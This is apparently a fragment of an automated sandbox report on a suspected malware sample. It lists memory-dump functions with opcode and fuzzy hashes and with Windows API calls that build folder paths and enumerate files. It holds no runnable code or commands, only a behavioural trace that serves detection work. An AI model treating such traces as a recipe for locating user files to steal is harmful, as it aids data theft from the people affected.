                          • Instruction ID: 9c16add79dfbdad225b4b9bf20a123c79383cf9e839c4d8fb88bc5852d7ac7cb
                          • Opcode Fuzzy Hash: 3c5603587793b1f6e4e74743477838b0e5f96ac2e22e902924320a8052bfad4e
                          • Instruction Fuzzy Hash: 40F06D36944A189BF663FBA89802F9F33A8AF00728F100149F605F61D3DB245D808B97
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch
                          • String ID: MOC$RCC
                          • API String ID: 78271584-2084237596
                          • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                          • Instruction ID: fc620f7a72fd225c482e0dda35c22e1db9f914fe2170530d20c93caa30239b00
                          • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                          • Instruction Fuzzy Hash: 4841487190020DAFDF16DFA8DC81AEEBBB5BF49304F188199F904AA211D3359A50DF51
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 000351CA
                          • lstrcat.KERNEL32(?,00041058), ref: 000351E7
                          • lstrcat.KERNEL32(?,00FD9118), ref: 000351FB
                          • lstrcat.KERNEL32(?,0004105C), ref: 0003520D
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034B7C
                            • Part of subcall function 00034B60: FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                            • Part of subcall function 00034B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                            • Part of subcall function 00034B60: FindClose.KERNEL32(000000FF), ref: 00034DE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: bef2b5600344404abad6b0d945ff548e90ec848a92dbdbb3e1413964860ad9b5
                          • Instruction ID: b4655d6cd158e40c2a918600aed8ff33a6ba6fe46cac0fe2af7bae0c1905d87d
                          • Opcode Fuzzy Hash: bef2b5600344404abad6b0d945ff548e90ec848a92dbdbb3e1413964860ad9b5
                          • Instruction Fuzzy Hash: 6821FCB6904208ABDB14FB70FC4AEFD733D9B54340F0046A4B65656192EF749AC8CB91